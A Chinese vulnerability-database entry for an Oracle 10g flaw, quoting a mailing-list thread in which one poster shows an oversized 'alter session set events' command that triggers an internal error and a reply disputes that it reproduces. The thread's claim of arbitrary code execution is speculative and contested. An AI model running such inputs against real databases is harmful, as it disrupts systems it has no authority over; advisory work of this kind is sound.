Oracle 10g 无效参数指令 未明漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191504 漏洞类型 未知
发布时间 2007-03-02 更新时间 2007-03-02
CVE编号 CVE-2006-7067 CNNVD-ID CNNVD-200703-047
漏洞平台 N/A CVSS评分 6.0
|漏洞来源
https://www.securityfocus.com/bid/86860
https://cxsecurity.com/issue/WLB-2007030026
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-047
|漏洞详情
Oracle10gR2以及可能其他版本允许远程攻击者借助一个带有无效参数的"转换会话设置事件"指令,触发内部错误和可能造成其他影响。
|漏洞EXP
Interesting comment. So if I understand what you are
saying I should be able to create a user:

SQL> create user nottoosmart identified by
d0ntkn0wmuch;

User created.

SQL> grant create session to nottoosmart;

Grant succeeded.

SQL> connect nottoosmart/d0ntkn0wmuch
Connected.
SQL> alter session set events '10046 trace name
context forever level 16';
ERROR:
ORA-01031: insufficient privileges

Hmm - would you mind posting your EXACT test case? I
ran this against a 9.2.0.7, 10.2.0.1 and 10.2.0.2
database and seem to get different results then you
are seeing.  Just for the heck of it I went ahead and
granted the user alter session privileges:

SQL> conn / as sysdba
Connected.
SQL> grant alter session to nottoosmart;

Grant succeeded.

SQL> connect nottoosmart/d0ntkn0wmuch
Connected.
SQL> alter session set events '10046 trace name
context forever level 16';
ERROR:
ORA-02194: event specification syntax error 230 (minor
error 215) near 'LEVEL'

so even a user that I've purposely given privileges to
alter their own session doesn't seem to be able to do
anything with this command.

So far I have to call this myth: Busted

---Original message----
I can't believe it. Oracle releases new patches and
they have not been solved one of the main problems: A
user with only the SELECT privilege can do WHATEVER
(S)HE WANTS WITH THE ENTIRE DATABASE!!!!

I'm not sure if is time to full disclosure it but,
anyway, I will "full disclosure" one inocent issue, an
integer overflow:

Example:
--Connect with any user with only CREATE SESSION
SQL> alter session set events '10046 trace name
context forever, level 
SQL> 16';

Session altered.

SQL> alter session set events
'10046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004610046100461004610046100461004610046
100461004610046100461004610046100461004610046100461004610046100461004610
046100461004610046100461004610046100461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004610046100461004610046100461004610046
100461004610046100461004610046100461004610046100461004610046100461004610
046100461004610046100461004610046100461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
00461004610046trace
name context forever, level 16';
ERROR:
ORA-00600: internal error code, arguments: [300],
[985], [], [], [], [], [], []

It's not even a crash but (be sure) that there are
other "combinations" that makes it vulnerable to
integer overflows allowing the execution of arbritrary
code.

PD: Hello Mary Ann! Are you on holidays?

_________________________________________________________________
Grandes xitos, superhroes, imitaciones, cine y TV...

http://es.msn.kiwee.com/ Lo mejor para tu mvil.

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com
|受影响的产品
Oracle Oracle10g Personal Edition 10.2.1 R2
|参考资料

来源:BUGTRAQ
名称:20060728Oracle10gR2and,probably,allpreviousversions
链接:http://www.securityfocus.com/archive/1/archive/1/441477/100/0/threaded
来源:BUGTRAQ
名称:20060727Oracle10gR2and,probably,allpreviousversions
链接:http://www.securityfocus.com/archive/1/archive/1/441345/100/0/threaded
来源:FULLDISC
名称:20060728Oracle10gR2and,probably,allpreviousversions
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/048292.html
来源:FULLDISC
名称:20060727Oracle10gR2and,probably,allpreviousversions
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/048251.html
来源:SREASON
名称:2328
链接:http://securityreason.com/securityalert/2328